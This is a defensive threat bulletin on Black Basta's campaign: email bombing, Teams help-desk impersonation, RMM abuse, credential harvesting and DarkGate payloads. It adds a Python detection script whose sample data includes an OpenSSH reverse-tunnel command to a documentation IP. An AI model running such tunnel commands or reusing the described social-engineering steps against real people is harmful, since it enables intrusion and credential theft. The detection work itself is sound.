Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

Summary:
In early October 2024, Rapid7 witnessed a resurgence of activity related to an ongoing social engineering campaign being conducted by Black Basta ransomware operators. This activity was initially reported on by Rapid7 and has been ongoing since at least May 2024. Following the initial discovery, Rapid7 then uncovered an update in the tactics and payloads of the campaign that they derived from activity reported on in August 2024 that used Microsoft Teams for their lures. This new report elaborates on this campaign further, highlighting newly refined delivery methods, increased defense evasion capabilities, and new malware payloads.

The starting point of the attacks entails potential victims being email bombed by Black Basta operators. Following the email bomb, the adversary will reach out for initial contact with impacted users primarily via Microsoft Teams. The adversary will attempt to call or message the impacted user offering assistance while impersonating a member of the target organization’s help desk, support team, or IT staff, highlighting that these recent attacks are initiated similarly to previous activity attributed to this campaign. When the user interacts with the lure, the adversary will attempt to convince the user to execute a remote monitoring and management (RMM) tool. Rapid7 has also observed attempts to leverage the OpenSSH client, a native Windows utility, to establish a reverse shell. In at least one instance, the threat actor shared a QR code with the targeted user, potentially attempting to bypass MFA after stealing user credentials. In a majority of cases, Rapid7 has observed that the operator, after gaining access to the user’s asset via an RMM tool, will then attempt to download and execute additional malware payloads. The payload delivery methods vary per case but have included external compromised SharePoint instances, common file-sharing websites, servers rented through hosting providers, or even direct upload to the compromised asset when the RMM tool provides remote control. One of the most common first steps after gaining either the confidence of the user or remote access is to execute a custom credential harvester. Following the execution of a credential harvester, an operator will typically infect the asset with Zbot or DarkGate. DarkGate can change its behavior if a known security product is detected. The DarkGate sample executed in this campaign contains 78 remote commands.

Analyst Comments:
Black Basta's evolving tactics highlight the importance of robust security awareness training and strong endpoint security. The group's ability to adapt and leverage legitimate tools like Microsoft Teams underscores the need for vigilant monitoring of unusual activity, especially when it involves external users. The use of QR codes, potentially for MFA bypass, warrants further investigation into the intent behind them. Organizations should prioritize incident response planning and consider implementing advanced threat detection and response solutions to mitigate these threats. One security control that may strengthen an organization’s posture is to baseline every remote monitoring and management solution installed in the environment and then use an application allowlisting solution, such as AppLocker or Microsoft Defender Application Control, to block all unapproved RMM solutions from executing. It is also recommended to ensure an organization’s users are aware of established IT channels and communication methods so they can identify and prevent common social engineering attacks.

Suggested Corrections:
IOCs are available here.

Rapid7 Recommendations for Limiting Exposure to These Types of Attacks
  • Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done, for example, by blocking all external domains or by maintaining an allowlist or blocklist of domains. Microsoft Teams allows all external requests by default. For more information, see this reference.
  • Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.
  • Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests.
  • Standardize VPN access. Traffic from known low cost VPN solutions should be blocked at a firewall level if there is no business use case.
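The chain described in the summary (email bomb, then an external Teams contact, then execution of an unapproved RMM tool or the native OpenSSH client) and the RMM-baselining and Teams-restriction recommendations above translate directly into a correlation rule. The following is an added example written for this page, not code from Rapid7 or from the report; the event schema, the internal domain, the tool names, the thresholds and the sample telemetry are all constructed placeholders, and the only real identifier is `ssh.exe`, the Windows OpenSSH client binary, whose `-R` remote-forward option is used here as a generic indicator because the page does not give the exact command line seen in the campaign.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed organisational baseline (placeholders, not values from the report).
INTERNAL_DOMAIN = "example-corp.com"
APPROVED_RMM = {"approved-rmm.exe"}          # tools in the RMM baseline
KNOWN_RMM = APPROVED_RMM | {"unapproved-rmm.exe"}
BURST_THRESHOLD = 50                         # emails to one mailbox inside BURST_WINDOW
BURST_WINDOW = timedelta(minutes=10)
FOLLOW_UP_WINDOW = timedelta(hours=6)        # how long after the bomb a Teams contact still counts


def parse_ts(s):
    return datetime.fromisoformat(s)


def email_bursts(events):
    """Recipients hit by >= BURST_THRESHOLD emails within BURST_WINDOW (sliding window).
    Returns {recipient: start time of the first qualifying window}."""
    by_rcpt = defaultdict(list)
    for e in events:
        if e["type"] == "email":
            by_rcpt[e["recipient"]].append(parse_ts(e["ts"]))
    bursts = {}
    for rcpt, times in by_rcpt.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > BURST_WINDOW:
                start += 1
            if end - start + 1 >= BURST_THRESHOLD:
                bursts[rcpt] = times[start]
                break
    return bursts


def external_teams_contacts(events):
    """Teams chats or calls whose sender is outside the tenant."""
    return [e for e in events
            if e["type"] == "teams"
            and not e["sender"].lower().endswith("@" + INTERNAL_DOMAIN)]


def suspicious_processes(events):
    """Process starts matching the hands-on-keyboard stage: an RMM tool outside the
    approved baseline, or the OpenSSH client started with a remote port forward."""
    hits = []
    for e in events:
        if e["type"] != "process":
            continue
        image, argv = e["image"].lower(), e["cmdline"].split()
        if image in KNOWN_RMM and image not in APPROVED_RMM:
            hits.append((e, "unapproved RMM tool"))
        elif image == "ssh.exe" and "-R" in argv:
            hits.append((e, "OpenSSH client with remote port forward"))
    return hits


def correlate(events):
    """One alert per user for whom all three stages occur in order."""
    teams, procs, alerts = external_teams_contacts(events), suspicious_processes(events), []
    for rcpt, t0 in email_bursts(events).items():
        user = rcpt.split("@")[0]
        contact = next((c for c in teams if c["recipient"] == rcpt
                        and t0 <= parse_ts(c["ts"]) <= t0 + FOLLOW_UP_WINDOW), None)
        if contact is None:
            continue
        t1 = parse_ts(contact["ts"])
        stages = [why for p, why in procs if p["user"] == user and parse_ts(p["ts"]) >= t1]
        if stages:
            alerts.append({"user": user, "email_bomb_start": t0.isoformat(),
                           "teams_sender": contact["sender"], "stages": stages})
    return alerts


def sample_events():
    """Constructed telemetry: one targeted user (alice) and one benign control user (bob)."""
    base = datetime(2024, 10, 1, 9, 0, 0)
    ev = [{"type": "email", "ts": (base + timedelta(seconds=6 * i)).isoformat(),
           "recipient": f"alice@{INTERNAL_DOMAIN}", "sender": f"noreply@list-{i}.invalid"}
          for i in range(60)]                       # 60 sign-up confirmations in 6 minutes
    ev += [
        {"type": "email", "ts": base.isoformat(),
         "recipient": f"bob@{INTERNAL_DOMAIN}", "sender": f"hr@{INTERNAL_DOMAIN}"},
        {"type": "teams", "ts": (base + timedelta(minutes=40)).isoformat(),
         "recipient": f"alice@{INTERNAL_DOMAIN}", "sender": "helpdesk@external-tenant.invalid"},
        {"type": "process", "ts": (base + timedelta(minutes=55)).isoformat(),
         "user": "alice", "image": "unapproved-rmm.exe", "cmdline": "unapproved-rmm.exe"},
        {"type": "process", "ts": (base + timedelta(minutes=58)).isoformat(),
         "user": "alice", "image": "ssh.exe",
         "cmdline": "ssh.exe -R 2222:localhost:22 user@203.0.113.10"},
        {"type": "process", "ts": (base + timedelta(minutes=30)).isoformat(),
         "user": "bob", "image": "approved-rmm.exe", "cmdline": "approved-rmm.exe"},
    ]
    return ev


if __name__ == "__main__":
    for alert in correlate(sample_events()):
        print(alert)
```

The sliding window in `email_bursts` is the part worth tuning: a legitimate mailbox can see a burst from a mailing-list migration, so the threshold alone is noisy, which is why `correlate` only raises an alert once an external Teams contact and an unapproved tool follow it for the same user. Bob's single email and approved RMM tool produce nothing.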

General Ransomware Suggested Corrections
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.

Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.

Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?

Check Your Security Team's Work: Use a third-party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.

Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.

Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.

Link(s):
https://thehackernews.com/2024/12/black-basta-ransomware-evolves-with.html

https://www.rapid7.com/blog/post/20...paign-drops-zbot-darkgate-and-custom-malware/

https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-campaign-refreshes-payloads/

https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/